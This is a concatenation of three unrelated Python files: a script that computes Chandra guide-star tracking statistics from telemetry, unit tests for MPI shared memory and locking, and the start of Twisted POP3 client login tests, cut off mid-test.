# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import division
import os
import time
import sys
import argparse
import numpy as np
import tables
from astropy.table import Table
import logging
import warnings
from Chandra.Time import DateTime
import agasc
from kadi import events
from Ska.engarchive import fetch, fetch_sci
import mica.archive.obspar
from mica.starcheck.starcheck import get_starcheck_catalog_at_date
import Ska.astro
from Quaternion import Quat
from chandra_aca import dark_model
from chandra_aca.transform import radec_to_eci
# Ignore known numexpr.necompiler and tables.conditions warnings
warnings.filterwarnings(
'ignore',
message="using `oa_ndim == 0` when `op_axes` is NULL is deprecated.*",
category=DeprecationWarning)
logger = logging.getLogger('star_stats')
logger.setLevel(logging.INFO)
if not len(logger.handlers):
logger.addHandler(logging.StreamHandler())
STAT_VERSION = 0.6
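# Column definitions (name, dtype) for the guide statistics table, grouped by
# observation info ('obs'), star catalog entry ('cat'), tracking statistics
# ('stat'), AGASC star parameters ('agasc'), CCD temperature ('temp'), and
# manual bad-obsid flags ('bad').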
GUIDE_COLS = {
'obs': [
('obsid', 'int'),
('obi', 'int'),
('kalman_tstart', 'float'),
('npnt_tstop', 'float'),
('kalman_datestart', 'S21'),
('npnt_datestop', 'S21'),
('revision', 'S15')],
'cat': [
('slot', 'int'),
('idx', 'int'),
('type', 'S5'),
('yang', 'float'),
('zang', 'float'),
('sz', 'S4'),
('mag', 'float')],
'stat': [
('n_samples', 'int'),
('n_track', 'int'),
('f_track', 'float'),
('f_racq', 'float'),
('f_srch', 'float'),
('f_none', 'float'),
('n_kalman', 'int'),
('no_track', 'float'),
('f_within_0.3', 'float'),
('f_within_1', 'float'),
('f_within_3', 'float'),
('f_within_5', 'float'),
('f_outside_5', 'float'),
('f_obc_bad', 'float'),
('f_common_col', 'float'),
('f_quad_bound', 'float'),
('f_sat_pix', 'float'),
('f_def_pix', 'float'),
('f_ion_rad', 'float'),
('f_mult_star', 'float'),
('aoacmag_min', 'float'),
('aoacmag_mean', 'float'),
('aoacmag_max', 'float'),
('aoacmag_5th', 'float'),
('aoacmag_16th', 'float'),
('aoacmag_50th', 'float'),
('aoacmag_84th', 'float'),
('aoacmag_95th', 'float'),
('aoacmag_std', 'float'),
('aoacyan_mean', 'float'),
('aoaczan_mean', 'float'),
('dy_min', 'float'),
('dy_mean', 'float'),
('dy_std', 'float'),
('dy_max', 'float'),
('dz_min', 'float'),
('dz_mean', 'float'),
('dz_std', 'float'),
('dz_max', 'float'),
('dr_min', 'float'),
('dr_mean', 'float'),
('dr_std', 'float'),
('dr_5th', 'float'),
('dr_95th', 'float'),
('dr_max', 'float'),
('n_track_interv', 'int'),
('n_long_track_interv', 'int'),
('n_long_no_track_interv', 'int'),
('n_racq_interv', 'int'),
('n_srch_interv', 'int'),
],
'agasc': [
('agasc_id', 'int'),
('color', 'float'),
('ra', 'float'),
('dec', 'float'),
('epoch', 'float'),
('pm_ra', 'int'),
('pm_dec', 'int'),
('var', 'int'),
('pos_err', 'int'),
('mag_aca', 'float'),
('mag_aca_err', 'int'),
('mag_band', 'int'),
('pos_catid', 'int'),
('aspq1', 'int'),
('aspq2', 'int'),
('aspq3', 'int'),
('acqq1', 'int'),
('acqq2', 'int'),
('acqq4', 'int')],
'temp': [
('n100_warm_frac', 'float'),
('tccd_mean', 'float'),
('tccd_max', 'float')],
'bad': [
('known_bad', 'bool'),
('bad_comment', 'S15')],
}
def get_options():
parser = argparse.ArgumentParser(
description="Update guide stats table")
parser.add_argument("--check-missing",
action='store_true',
help="check for missing observations in table and reprocess")
parser.add_argument("--obsid",
help="specific obsid to process. Not required in regular update mode")
parser.add_argument("--start",
help="start time for processing")
parser.add_argument("--stop",
help="stop time for processing")
parser.add_argument("--datafile",
default="gs.h5")
opt = parser.parse_args()
return opt
def _deltas_vs_obc_quat(vals, times, catalog):
# Misalign is the identity matrix because this is the OBC quaternion
aca_misalign = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
q_att = Quat(q=np.array([vals['AOATTQT1'],
vals['AOATTQT2'],
vals['AOATTQT3'],
vals['AOATTQT4']]).transpose())
Ts = q_att.transform
acqs = catalog
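# Radians to arcseconds conversion factor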
R2A = 206264.81
dy = {}
dz = {}
yag = {}
zag = {}
star_info = {}
for slot in range(0, 8):
if slot not in acqs['slot']:
continue
agasc_id = acqs[acqs['slot'] == slot][0]['id']
if agasc_id is None:
logger.info("No agasc id for slot {}, skipping".format(slot))
continue
try:
# This is not perfect for star catalogs for agasc 1.4 and 1.5
star = agasc.get_star(agasc_id, date=times[0], use_supplement=False)
except:
logger.info("agasc error on slot {}:{}".format(
slot, sys.exc_info()[0]))
continue
ra = star['RA_PMCORR']
dec = star['DEC_PMCORR']
star_pos_eci = radec_to_eci(ra, dec)
d_aca = np.dot(np.dot(aca_misalign, Ts.transpose(0, 2, 1)),
star_pos_eci).transpose()
yag[slot] = np.arctan2(d_aca[:, 1], d_aca[:, 0]) * R2A
zag[slot] = np.arctan2(d_aca[:, 2], d_aca[:, 0]) * R2A
dy[slot] = vals['AOACYAN{}'.format(slot)] - yag[slot]
dz[slot] = vals['AOACZAN{}'.format(slot)] - zag[slot]
star_info[slot] = star
return dy, dz, star_info, yag, zag
def get_data(start, stop, obsid=None, starcheck=None):
# Get telemetry
msids = ['AOACASEQ', 'AOACQSUC', 'AOFREACQ', 'AOFWAIT', 'AOREPEAT',
'AOACSTAT', 'AOACHIBK', 'AOFSTAR', 'AOFATTMD', 'AOACPRGS',
'AOATUPST', 'AONSTARS', 'AOPCADMD', 'AORFSTR1', 'AORFSTR2',
'AOATTQT1', 'AOATTQT2', 'AOATTQT3', 'AOATTQT4']
per_slot = ['AOACQID', 'AOACFCT', 'AOIMAGE',
'AOACMAG', 'AOACYAN', 'AOACZAN',
'AOACICC', 'AOACIDP', 'AOACIIR', 'AOACIMS',
'AOACIQB', 'AOACISP']
slot_msids = [field + '%s' % slot
for field in per_slot
for slot in range(0, 8)]
start_time = DateTime(start).secs
stop_time = DateTime(stop)
dat = fetch.MSIDset(msids + slot_msids,
start_time,
stop_time)
if len(dat['AOACASEQ']) == 0:
raise ValueError("No telemetry for obsid {}".format(obsid))
# Interpolate the MSIDset onto the original time grid (which shouldn't do much)
# but also remove all rows where any one msid has a bad value
dat.interpolate(times=dat['AOACASEQ'].times, bad_union=True)
eng_data = Table([col.vals for col in dat.values()], names=dat.keys())
eng_data['times'] = dat.times
times = eng_data['times']
if starcheck is None:
return eng_data, times, None
catalog = Table(starcheck['cat'])
catalog.sort('idx')
# Filter the catalog to be just guide stars
catalog = catalog[(catalog['type'] == 'GUI') | (catalog['type'] == 'BOT')]
# Get the position deltas relative to onboard solution
dy, dz, star_info, yag, zag = _deltas_vs_obc_quat(eng_data, times, catalog)
# And add the deltas to the table
for slot in range(0, 8):
if slot not in dy:
continue
eng_data['dy{}'.format(slot)] = dy[slot].data
eng_data['dz{}'.format(slot)] = dz[slot].data
eng_data['cat_yag{}'.format(slot)] = yag[slot]
eng_data['cat_zag{}'.format(slot)] = zag[slot]
cat_entry = catalog[catalog['slot'] == slot][0]
dmag = eng_data['AOACMAG{}'.format(slot)] - cat_entry['mag']
eng_data['dmag'] = dmag.data
eng_data['time'] = times
return eng_data, star_info
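# Split an array of sorted indices into runs of consecutive values, e.g.
# consecutive(np.array([1, 2, 3, 7, 8])) -> [array([1, 2, 3]), array([7, 8])]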
def consecutive(data, stepsize=1):
return np.split(data, np.where(np.diff(data) != stepsize)[0] + 1)
def calc_gui_stats(data, star_info):
logger.info("calculating statistics")
gui_stats = {}
for slot in range(0, 8):
if 'dy{}'.format(slot) not in data.colnames:
continue
stats = {}
aoacfct = data['AOACFCT{}'.format(slot)]
stats['n_samples'] = len(aoacfct)
if len(aoacfct) == 0:
gui_stats[slot] = stats
continue
stats['n_track'] = np.count_nonzero(aoacfct == 'TRAK')
stats['f_track'] = stats['n_track'] / stats['n_samples']
stats['f_racq'] = np.count_nonzero(aoacfct == 'RACQ') / stats['n_samples']
stats['f_srch'] = np.count_nonzero(aoacfct == 'SRCH') / stats['n_samples']
stats['f_none'] = np.count_nonzero(aoacfct == 'NONE') / stats['n_samples']
if np.all(aoacfct != 'TRAK'):
gui_stats[slot] = stats
continue
trak = data[aoacfct == 'TRAK']
ok_flags = ((trak['AOACIIR{}'.format(slot)] == 'OK ')
& (trak['AOACISP{}'.format(slot)] == 'OK '))
stats['n_kalman'] = np.count_nonzero(ok_flags)
stats['no_track'] = (stats['n_samples'] - stats['n_track']) / stats['n_samples']
stats['f_obc_bad'] = (stats['n_track'] - stats['n_kalman']) / stats['n_track']
stats['f_common_col'] = np.count_nonzero(trak['AOACICC{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_sat_pix'] = np.count_nonzero(trak['AOACISP{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_def_pix'] = np.count_nonzero(trak['AOACIDP{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_ion_rad'] = np.count_nonzero(trak['AOACIIR{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_mult_star'] = np.count_nonzero(trak['AOACIMS{}'.format(slot)] == 'ERR') / stats['n_track']
stats['f_quad_bound'] = np.count_nonzero(trak['AOACIQB{}'.format(slot)] == 'ERR') / stats['n_track']
track_interv = consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'TRAK'))
stats['n_track_interv'] = len(track_interv)
track_interv_durations = np.array([len(interv) for interv in track_interv])
stats['n_long_track_interv'] = np.count_nonzero(track_interv_durations > 60)
not_track_interv = consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] != 'TRAK'))
not_track_interv_durations = np.array([len(interv) for interv in not_track_interv])
stats['n_long_no_track_interv'] = np.count_nonzero(not_track_interv_durations > 60)
stats['n_racq_interv'] = len(consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'RACQ')))
stats['n_srch_interv'] = len(consecutive(np.flatnonzero(
data['AOACFCT{}'.format(slot)] == 'SRCH')))
# Reduce to just the samples that don't have the IR or SP flags set, are in
# Kalman mode on guide stars (AOACASEQ == 'KALM', AOPCADMD == 'NPNT',
# AOFSTAR == 'GUID'), and are more than 60 seconds past the start
kal = trak[ok_flags & (trak['AOACASEQ'] == 'KALM') & (trak['AOPCADMD'] == 'NPNT')
& (trak['AOFSTAR'] == 'GUID') & (trak['time'] > (data['time'][0] + 60))]
dy = kal['dy{}'.format(slot)]
dz = kal['dz{}'.format(slot)]
# cheating here and ignoring spherical trig
dr = (dy ** 2 + dz ** 2) ** .5
stats['star_tracked'] = np.any(dr < 5.0)
stats['spoiler_tracked'] = np.any(dr > 5.0)
deltas = {'dy': dy, 'dz': dz, 'dr': dr}
stats['dr_5th'] = np.percentile(deltas['dr'], 5)
stats['dr_95th'] = np.percentile(deltas['dr'], 95)
for ax in deltas:
stats['{}_mean'.format(ax)] = np.mean(deltas[ax])
stats['{}_std'.format(ax)] = np.std(deltas[ax])
stats['{}_max'.format(ax)] = np.max(deltas[ax])
stats['{}_min'.format(ax)] = np.min(deltas[ax])
mag = kal['AOACMAG{}'.format(slot)]
stats['aoacmag_min'] = np.min(mag)
stats['aoacmag_mean'] = np.mean(mag)
stats['aoacmag_max'] = np.max(mag)
stats['aoacmag_std'] = np.std(mag)
for perc in [5, 16, 50, 84, 95]:
stats[f'aoacmag_{perc}th'] = np.percentile(mag, perc)
stats['aoacyan_mean'] = np.mean(kal['AOACYAN{}'.format(slot)])
stats['aoaczan_mean'] = np.mean(kal['AOACZAN{}'.format(slot)])
for dist in ['0.3', '1', '3', '5']:
stats['f_within_{}'.format(dist)] = np.count_nonzero(dr < float(dist)) / len(kal)
stats['f_outside_5'] = np.count_nonzero(dr > 5) / len(kal)
gui_stats[slot] = stats
return gui_stats
def _get_obsids_to_update(check_missing=False, table_file=None, start=None, stop=None):
if check_missing:
last_tstart = start if start is not None else '2007:271:12:00:00'
kadi_obsids = events.obsids.filter(start=last_tstart)
try:
h5 = tables.open_file(table_file, 'r')
tbl = h5.root.data[:]
h5.close()
except:
raise ValueError("Could not read stats table {}".format(table_file))
# get all obsids that aren't already in tbl
obsids = [o.obsid for o in kadi_obsids if o.obsid not in tbl['obsid']]
else:
try:
h5 = tables.open_file(table_file, 'r')
tbl = h5.get_node('/', 'data')
last_tstart = tbl.cols.kalman_tstart[tbl.colindexes['kalman_tstart'][-1]]
h5.close()
except:
last_tstart = start if start is not None else '2002:012:12:00:00'
kadi_obsids = events.obsids.filter(start=last_tstart, stop=stop)
# Skip the first obsid (as we already have it in the table)
obsids = [o.obsid for o in kadi_obsids][1:]
return obsids
def calc_stats(obsid):
obspar = mica.archive.obspar.get_obspar(obsid)
if not obspar:
raise ValueError("No obspar for {}".format(obsid))
manvr = None
dwell = None
try:
manvrs = events.manvrs.filter(obsid=obsid, n_dwell__gt=0)
dwells = events.dwells.filter(obsid=obsid)
if dwells.count() == 1 and manvrs.count() == 0:
# There is a single dwell for this obsid but no matching maneuver (this can
# happen when the dwells of one maneuver have different obsids, which is
# unusual). Don't throw an overlapping-interval kadi error; just use the
# maneuver that leads to this dwell.
dwell = dwells[0]
manvr = dwell.manvr
elif dwells.count() == 0:
# If there's just nothing, that doesn't need an error here
# and gets caught outside the try/except
pass
else:
# Else just take the first matches from each
manvr = manvrs[0]
dwell = dwells[0]
except ValueError:
multi_manvr = events.manvrs.filter(start=obspar['tstart'] - 100000,
stop=obspar['tstart'] + 100000)
multi = multi_manvr.select_overlapping(events.obsids(obsid=obsid))
deltas = [np.abs(m.tstart - obspar['tstart']) for m in multi]
manvr = multi[np.argmin(deltas)]
dwell = manvr.dwell_set.first()
if not manvr or not dwell:
raise ValueError("No manvr or dwell for {}".format(obsid))
if not manvr.get_next():
raise ValueError("No *next* manvr so can't calculate dwell")
if not manvr.guide_start:
raise ValueError("No guide transition for {}".format(obsid))
if not manvr.kalman_start:
raise ValueError("No Kalman transition for {}".format(obsid))
logger.info("Found obsid manvr at {}".format(manvr.start))
logger.info("Found dwell at {}".format(dwell.start))
starcheck = get_starcheck_catalog_at_date(manvr.guide_start)
if starcheck is None or 'cat' not in starcheck or not len(starcheck['cat']):
raise ValueError('No starcheck catalog found for {}'.format(
manvr.get_obsid()))
starcat_time = DateTime(starcheck['cat']['mp_starcat_time'][0]).secs
starcat_dtime = starcat_time - DateTime(manvr.start).secs
# If it looks like the wrong starcheck by time, give up
if abs(starcat_dtime) > 300:
raise ValueError("Starcheck cat time delta is {}".format(starcat_dtime))
if abs(starcat_dtime) > 30:
logger.warning("Starcheck cat time delta of {} is > 30 sec".format(abs(starcat_dtime)))
# The NPNT dwell should end when the next maneuver starts, but explicitly confirm via pcadmd
pcadmd = fetch.Msid('AOPCADMD', manvr.kalman_start, manvr.get_next().tstart + 20)
next_nman_start = pcadmd.times[pcadmd.vals != 'NPNT'][0]
vals, star_info = get_data(start=manvr.kalman_start, stop=next_nman_start,
obsid=obsid, starcheck=starcheck)
gui_stats = calc_gui_stats(vals, star_info)
obsid_info = {'obsid': obsid,
'obi': obspar['obi_num'],
'kalman_datestart': manvr.kalman_start,
'kalman_tstart': DateTime(manvr.kalman_start).secs,
'npnt_tstop': DateTime(next_nman_start).secs,
'npnt_datestop': DateTime(next_nman_start).date,
'revision': STAT_VERSION}
catalog = Table(starcheck['cat'])
catalog.sort('idx')
guide_catalog = catalog[(catalog['type'] == 'GUI') | (catalog['type'] == 'BOT')]
aacccdpt = fetch_sci.MSID('AACCCDPT', manvr.kalman_start, manvr.get_next().start)
warm_threshold = 100.0
tccd_mean = np.mean(aacccdpt.vals)
tccd_max = np.max(aacccdpt.vals)
warm_frac = dark_model.get_warm_fracs(warm_threshold, manvr.start, tccd_mean)
temps = {'tccd_mean': tccd_mean, 'n100_warm_frac': warm_frac,
'tccd_max': tccd_max}
return obsid_info, gui_stats, star_info, guide_catalog, temps
def table_gui_stats(obsid_info, gui_stats, star_info, catalog, temp):
logger.info("arranging stats into tabular data")
cols = (GUIDE_COLS['obs'] + GUIDE_COLS['cat'] + GUIDE_COLS['stat']
+ GUIDE_COLS['agasc'] + GUIDE_COLS['temp'] + GUIDE_COLS['bad'])
# Initialize all values to zero
table = Table(np.zeros((1, 8), dtype=cols).flatten())
# Set all columns with mag info to 99.0 initial value instead of zero
for col in table.dtype.names:
if 'aoacmag' in col:
table[col] = 99.0
for col in np.dtype(GUIDE_COLS['obs']).names:
if col in obsid_info:
table[col][:] = obsid_info[col]
# Make a mask to identify 'missing' slots
missing_slots = np.zeros(8, dtype=bool)
for slot in range(0, 8):
row = table[slot]
if slot not in catalog['slot']:
missing_slots[slot] = True
continue
for col in np.dtype(GUIDE_COLS['cat']).names:
row[col] = catalog[catalog['slot'] == slot][0][col]
for col in np.dtype(GUIDE_COLS['stat']).names:
if col in gui_stats[slot]:
row[col] = gui_stats[slot][col]
if slot not in star_info:
continue
row['color'] = star_info[slot]['COLOR1']
row['ra'] = star_info[slot]['RA_PMCORR']
row['dec'] = star_info[slot]['DEC_PMCORR']
for col in np.dtype(GUIDE_COLS['agasc']).names:
if col in ['color', 'ra', 'dec']:
continue
row[col] = star_info[slot][col.upper()]
row['tccd_mean'] = temp['tccd_mean']
row['tccd_max'] = temp['tccd_max']
row['n100_warm_frac'] = temp['n100_warm_frac']
row['known_bad'] = False
row['bad_comment'] = ''
# Exclude any rows that are missing
table = table[~missing_slots]
return table
def _save_gui_stats(t, table_file=None):
if table_file is None:
return
if not os.path.exists(table_file):
cols = (GUIDE_COLS['obs'] + GUIDE_COLS['cat'] + GUIDE_COLS['stat']
+ GUIDE_COLS['agasc'] + GUIDE_COLS['temp'] + GUIDE_COLS['bad'])
desc, byteorder = tables.descr_from_dtype(np.dtype(cols))
filters = tables.Filters(complevel=5, complib='zlib')
h5 = tables.open_file(table_file, 'a')
tbl = h5.create_table('/', 'data', desc, filters=filters,
expectedrows=1e6)
tbl.cols.obsid.create_index()
tbl.cols.kalman_tstart.create_csindex()
tbl.cols.agasc_id.create_index()
h5.close()
del h5
h5 = tables.open_file(table_file, 'a')
tbl = h5.get_node('/', 'data')
have_obsid_coord = tbl.get_where_list(
'(obsid == {}) & (obi == {})'.format(
t[0]['obsid'], t[0]['obi']), sort=True)
if len(have_obsid_coord):
obsid_rec = tbl.read_coordinates(have_obsid_coord)
if len(obsid_rec) != len(t):
raise ValueError(
"Could not update {}; different number of slots".format(
t[0]['obsid']))
# preserve any 'known_bad' status
for row in obsid_rec:
slot = row['slot']
t['known_bad'][t['slot'] == slot] = row['known_bad']
t['bad_comment'][t['slot'] == slot] = row['bad_comment']
tbl.modify_coordinates(have_obsid_coord, t.as_array())
else:
tbl.append(t.as_array())
logger.info("saving stats to h5 table")
tbl.flush()
h5.flush()
h5.close()
def update(opt):
if opt.obsid:
obsids = [int(opt.obsid)]
else:
obsids = _get_obsids_to_update(table_file=opt.datafile, check_missing=opt.check_missing,
start=opt.start, stop=opt.stop)
for obsid in obsids:
logger.info("Processing obsid {}".format(obsid))
try:
obsid_info, gui_stats, star_info, guide_catalog, temp = calc_stats(obsid)
except Exception as e:
open(os.path.splitext(opt.datafile)[0] + '_skipped.dat', 'a').write(
"{}: {}\n".format(obsid, e))
logger.info("Skipping obsid {}: {}".format(obsid, e))
continue
if not len(gui_stats):
open(os.path.splitext(opt.datafile)[0] + '_skipped.dat', 'a').write(
"{}: No stats\n".format(obsid))
logger.info("Skipping obsid {}, no stats determined".format(obsid))
continue
t = table_gui_stats(obsid_info, gui_stats, star_info, guide_catalog, temp)
_save_gui_stats(t, opt.datafile)
def main():
opt = get_options()
update(opt)
if __name__ == '__main__':
main()
##
# Copyright (c) 2017-2020, all rights reserved. Use of this source code
# is governed by a BSD license that can be found in the top-level
# LICENSE file.
##
import os
import sys
import time
import traceback
import unittest
import numpy as np
import numpy.testing as nt
from .shmem import MPIShared
from .locking import MPILock
MPI = None
use_mpi = True
if "MPI_DISABLE" in os.environ:
use_mpi = False
if use_mpi and (MPI is None):
try:
import mpi4py.MPI as MPI
except ImportError:
print("Cannot import mpi4py, will only test serial functionality.", flush=True)
class ShmemTest(unittest.TestCase):
def setUp(self):
self.comm = None
if MPI is not None:
self.comm = MPI.COMM_WORLD
self.rank = 0
self.procs = 1
if self.comm is not None:
self.rank = self.comm.rank
self.procs = self.comm.size
def tearDown(self):
pass
def read_write(self, comm):
"""Run a sequence of various access tests."""
rank = 0
procs = 1
if comm is not None:
rank = comm.rank
procs = comm.size
# Dimensions of our shared memory array
datadims = (2, 5, 10)
# Dimensions of the incremental slab that we will
# copy during each set() call.
updatedims = (1, 1, 5)
# How many updates are there to cover the whole
# data array?
nupdate = 1
for d in range(len(datadims)):
nupdate *= datadims[d] // updatedims[d]
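# For datadims = (2, 5, 10) and updatedims = (1, 1, 5) this gives
# 2 * 5 * 2 = 20 updates.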
for datatype in [np.int32, np.int64, np.float32, np.float64]:
# For testing the "set()" method, every process is going to
# create a full-sized data buffer and fill it with its process rank.
local = np.ones(datadims, dtype=datatype)
local *= rank
# A context manager is the pythonic way to make sure that the
# object has no dangling reference counts after leaving the context,
# and will ensure that the shared memory is freed properly.
with MPIShared(local.shape, local.dtype, comm) as shm:
for p in range(procs):
# Every process takes turns writing to the buffer.
setdata = None
setoffset = (0, 0, 0)
# Write to the whole data volume, but in small blocks
for upd in range(nupdate):
if p == rank:
# My turn! Write my process rank to the buffer slab.
setdata = local[
setoffset[0] : setoffset[0] + updatedims[0],
setoffset[1] : setoffset[1] + updatedims[1],
setoffset[2] : setoffset[2] + updatedims[2],
]
try:
# All processes call set(), but only data on rank p matters.
shm.set(setdata, setoffset, fromrank=p)
except:
print(
"proc {} threw exception during set()".format(rank),
flush=True,
)
if comm is not None:
comm.Abort()
else:
sys.exit(1)
try:
# Same as set(), but using __setitem__ with an
# allreduce to find which process is setting.
# The key is given as a tuple of slices.
if setdata is None:
shm[None] = setdata
else:
shm[
setoffset[0] : setoffset[0] + setdata.shape[0],
setoffset[1] : setoffset[1] + setdata.shape[1],
setoffset[2] : setoffset[2] + setdata.shape[2],
] = setdata
except:
print(
"proc {} threw exception during __setitem__".format(
rank
),
flush=True,
)
if comm is not None:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(
exc_type, exc_value, exc_traceback
)
lines = ["Proc {}: {}".format(rank, x) for x in lines]
print("".join(lines), flush=True)
comm.Abort()
else:
raise
# Increment the write offset within the array
x = setoffset[0]
y = setoffset[1]
z = setoffset[2]
z += updatedims[2]
if z >= datadims[2]:
z = 0
y += updatedims[1]
if y >= datadims[1]:
y = 0
x += updatedims[0]
setoffset = (x, y, z)
# Every process is now going to read a copy from the shared memory
# and make sure that they see the data written by the current process.
check = np.zeros_like(local)
check[:, :, :] = shm[:, :, :]
truth = np.ones_like(local)
truth *= p
# This should be bitwise identical, even for floats
nt.assert_equal(check[:, :, :], truth[:, :, :])
# Try full array assignment with slices containing None start
# values
if p != rank:
shm[None] = None
else:
shm[:, :, :] = local
check[:, :, :] = shm[:, :, :]
nt.assert_equal(check[:, :, :], truth[:, :, :])
# Ensure that we can reference the memory buffer from numpy without
# a memory copy. The intention is that a slice of the shared memory
# buffer should appear as a C-contiguous ndarray whenever we slice
# along the last dimension.
for p in range(procs):
if p == rank:
slc = shm[1, 2]
print(
"proc {} slice has dims {}, dtype {}, C = {}".format(
p, slc.shape, slc.dtype.str, slc.flags["C_CONTIGUOUS"]
),
flush=True,
)
if comm is not None:
comm.barrier()
def test_world(self):
if self.comm is None:
print("Testing MPIShared without MPI...", flush=True)
elif self.comm.rank == 0:
print("Testing MPIShared with world communicator...", flush=True)
self.read_write(self.comm)
def test_split(self):
if self.comm is not None:
if self.comm.rank == 0:
print("Testing MPIShared with split grid communicator...", flush=True)
# Split the comm into a grid
n_y = int(np.sqrt(self.comm.size))
if n_y < 1:
n_y = 1
n_x = self.comm.size // n_y
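# e.g. with 6 processes: n_y = 2 and n_x = 3, a 2 x 3 process grid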
y_rank = self.comm.rank // n_x
x_rank = self.comm.rank % n_x
x_comm = self.comm.Split(y_rank, x_rank)
y_comm = self.comm.Split(x_rank, y_rank)
self.read_write(x_comm)
self.read_write(y_comm)
def test_comm_self(self):
if self.comm is not None:
if self.comm.rank == 0:
print("Testing MPIShared with COMM_SELF...", flush=True)
# Every process does the operations on COMM_SELF
self.read_write(MPI.COMM_SELF)
def test_shape(self):
good_dims = [
(2, 5, 10),
np.array([10, 2], dtype=np.int32),
np.array([5, 2], dtype=np.int64),
np.array([10, 2], dtype=np.int),
]
bad_dims = [
(2, 5.5, 10),
np.array([10, 2], dtype=np.float32),
np.array([5, 2], dtype=np.float64),
np.array([10, 2.5], dtype=np.float32),
]
dt = np.float64
for dims in good_dims:
try:
shm = MPIShared(dims, dt, self.comm)
if self.rank == 0:
print("successful creation with shape {}".format(dims), flush=True)
del shm
except ValueError:
if self.rank == 0:
print(
"unsuccessful creation with shape {}".format(dims), flush=True
)
for dims in bad_dims:
try:
shm = MPIShared(dims, dt, self.comm)
if self.rank == 0:
print("unsuccessful rejection of shape {}".format(dims), flush=True)
del shm
except ValueError:
if self.rank == 0:
print("successful rejection of shape {}".format(dims), flush=True)
class LockTest(unittest.TestCase):
def setUp(self):
self.comm = None
if MPI is not None:
self.comm = MPI.COMM_WORLD
self.rank = 0
self.procs = 1
if self.comm is not None:
self.rank = self.comm.rank
self.procs = self.comm.size
self.sleepsec = 0.2
def tearDown(self):
pass
def test_lock(self):
with MPILock(self.comm, root=0, debug=True) as lock:
for lk in range(5):
msg = "test_lock: process {} got lock {}".format(self.rank, lk)
lock.lock()
print(msg, flush=True)
# time.sleep(self.sleepsec)
lock.unlock()
if self.comm is not None:
self.comm.barrier()
def run():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(LockTest))
suite.addTest(unittest.makeSuite(ShmemTest))
runner = unittest.TextTestRunner()
runner.run(suite)
return
# -*- test-case-name: twisted.mail.test.test_pop3client -*-
# Copyright (c) 2001-2004 Divmod Inc.
# See LICENSE for details.
import sys
import inspect
from zope.interface import directlyProvides
from twisted.mail.pop3 import AdvancedPOP3Client as POP3Client
from twisted.mail.pop3 import InsecureAuthenticationDisallowed
from twisted.mail.pop3 import ServerErrorResponse
from twisted.protocols import loopback
from twisted.internet import reactor, defer, error, protocol, interfaces
from twisted.python import log
from twisted.trial import unittest
from twisted.test.proto_helpers import StringTransport
from twisted.protocols import basic
from twisted.mail.test import pop3testserver
try:
from twisted.test.ssl_helpers import ClientTLSContext, ServerTLSContext
except ImportError:
ClientTLSContext = ServerTLSContext = None
class StringTransportWithConnectionLosing(StringTransport):
def loseConnection(self):
self.protocol.connectionLost(error.ConnectionDone())
capCache = {"TOP": None, "LOGIN-DELAY": "180", "UIDL": None, \
"STLS": None, "USER": None, "SASL": "LOGIN"}
def setUp(greet=True):
p = POP3Client()
# Skip the CAPA request that login would otherwise issue by giving the
# client a pre-populated capability cache
p._capCache = capCache
t = StringTransportWithConnectionLosing()
t.protocol = p
p.makeConnection(t)
if greet:
p.dataReceived('+OK Hello!\r\n')
return p, t
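# Wrap a zero-argument callable as a Deferred callback that ignores the
# result passed to it.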
def strip(f):
return lambda result, f=f: f()
class POP3ClientLoginTests(unittest.TestCase):
def testNegativeGreeting(self):
p, t = setUp(greet=False)
p.allowInsecureLogin = True
d = p.login("username", "password")
p.dataReceived('-ERR Offline for maintenance\r\n')
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Offline for maintenance"))
def testOkUser(self):
p, t = setUp()
d = p.user("username")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("+OK send password\r\n")
return d.addCallback(self.assertEqual, "send password")
def testBadUser(self):
p, t = setUp()
d = p.user("username")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("-ERR account suspended\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "account suspended"))
def testOkPass(self):
p, t = setUp()
d = p.password("password")
self.assertEqual(t.value(), "PASS password\r\n")
p.dataReceived("+OK you're in!\r\n")
return d.addCallback(self.assertEqual, "you're in!")
def testBadPass(self):
p, t = setUp()
d = p.password("password")
self.assertEqual(t.value(), "PASS password\r\n")
p.dataReceived("-ERR go away\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "go away"))
def testOkLogin(self):
p, t = setUp()
p.allowInsecureLogin = True
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("+OK go ahead\r\n")
self.assertEqual(t.value(), "USER username\r\nPASS password\r\n")
p.dataReceived("+OK password accepted\r\n")
return d.addCallback(self.assertEqual, "password accepted")
def testBadPasswordLogin(self):
p, t = setUp()
p.allowInsecureLogin = True
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("+OK waiting on you\r\n")
self.assertEqual(t.value(), "USER username\r\nPASS password\r\n")
p.dataReceived("-ERR bogus login\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "bogus login"))
def testBadUsernameLogin(self):
p, t = setUp()
p.allowInsecureLogin = True
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
p.dataReceived("-ERR bogus login\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "bogus login"))
def testServerGreeting(self):
p, t = setUp(greet=False)
p.dataReceived("+OK lalala this has no challenge\r\n")
self.assertEqual(p.serverChallenge, None)
def testServerGreetingWithChallenge(self):
p, t = setUp(greet=False)
p.dataReceived("+OK <here is the challenge>\r\n")
self.assertEqual(p.serverChallenge, "<here is the challenge>")
def testAPOP(self):
p, t = setUp(greet=False)
